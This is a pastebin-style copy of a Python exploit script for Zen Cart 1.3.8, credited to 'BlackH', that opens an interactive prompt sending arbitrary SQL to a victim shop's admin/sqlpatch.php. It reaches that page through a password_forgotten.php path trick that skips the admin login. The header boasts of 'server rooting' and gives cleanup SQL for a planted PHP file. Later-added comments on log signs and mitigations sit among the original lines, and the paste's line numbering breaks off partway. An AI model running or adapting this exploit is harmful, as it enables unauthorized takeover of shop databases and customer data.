FathurFreakz

Zen.py

Feb 23rd, 2014
  1. #!/usr/bin/python
  2.  
  3. #
  4. # ------- Zen Cart 1.3.8 Remote SQL Execution
  5. # http://www.zen-cart.com/
  6. # Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone!
  7. # A new version (1.3.8a) is available on http://www.zen-cart.com/
  8. #
  9. # BlackH :)
  10. #
  11.  
  12. #
  13. # Notes: must have admin/sqlpatch.php enabled
  14. #
  15. # clean the database :
  16. # DELETE FROM `record_company_info` WHERE `record_company_id` = (SELECT `record_company_id` FROM `record_company` WHERE `record_company_image` = '8d317.php' LIMIT 1);
  17. # DELETE FROM `record_company` WHERE `record_company_image` = '8d317.php';
  18.  
  19. import urllib, urllib2, re, sys
  20.  
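# Legacy module-level state: `a` aliases sys.argv and `b` used to be the shared
# scan counter. option() no longer touches either; the names are kept only so
# the module's globals stay unchanged.
a, b = sys.argv, 0


def option(name, need=0):
    """Return the value that follows ``-<name>`` on the command line.

    Args:
        name: Option name without the leading dash.
        need: Truthy when the option is mandatory.

    Returns:
        The argument after ``-<name>`` as a string, or None when the option
        is absent (or has no value after it) and ``need`` is falsy.

    Raises:
        SystemExit: With status 1 when a required option is missing.
    """
    flag = '-' + name
    # A local index replaces the old global counter, which was never reset and
    # made every call after the first read the wrong argv slot. Scanning stops
    # one short of the end so a trailing flag with no value is reported as
    # missing instead of raising IndexError.
    for index, param in enumerate(sys.argv[:-1]):
        if param == flag:
            return str(sys.argv[index + 1])
    if need:
        # Same text the original print statement produced, written so that it
        # parses as a single-argument print on Python 2 and Python 3.
        print('\n#error ' + flag + ' parameter required')
        sys.exit(1)
    return None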
  31.  
# Started without any argument: print the author's usage banner and stop with
# a non-zero status. The banner text is kept exactly as it appears in this
# copy of the paste.
if len(sys.argv) <= 1:
    script_name = sys.argv[0]
    banner = """
=____________ Zen Cart 1.3.8 Remote SQL Execution Exploit ____________=
========================================================================
| BlackH <Bl4ck.H@gmail.com> |
========================================================================
| |
| $system> python """ + script_name + """ -url <url> |
| Param: <url> ex: http://victim.com/site (no slash) |
| |
| Note: blind "injection" |
========================================================================
"""
    print banner
    exit(1)
  46.  
# -url is mandatory; option() ends the process when it is missing.
url = option('url', 1)
# Extra path segment appended after sqlpatch.php.
# NOTE(review): presumably this makes the admin login check treat the request
# as the password-reset page - confirm against the vendor advisory.
trick = "/password_forgotten.php"
endpoint = url + "/admin/sqlpatch.php" + trick + "?action=execute"

# Prompt loop: every line typed is POSTed as the `query_string` form field.
# The request carries no cookie or credential, so the shape to look for in
# web-server logs is a POST to admin/sqlpatch.php with trailing path info and
# action=execute from a client that never logged in. Per the header note, this
# only works while admin/sqlpatch.php is enabled, so restricting access to the
# admin directory and applying the vendor's fix are the relevant mitigations.
while True:
    statement = raw_input('sql@jah$ ')
    if statement == "exit":
        exit(1)
    form_body = urllib.urlencode({'query_string': statement})
    response_text = urllib2.urlopen(urllib2.Request(endpoint, form_body)).read()
    # The returned page is the only feedback: the script looks for the
    # one-statement confirmation text and never sees query results.
    accepted = re.findall('1 statements processed', response_text)
    if not accepted:
        print '>> failed, be sure to end with ; (', statement, ")"
    else:
        print '>> success (', statement, ")"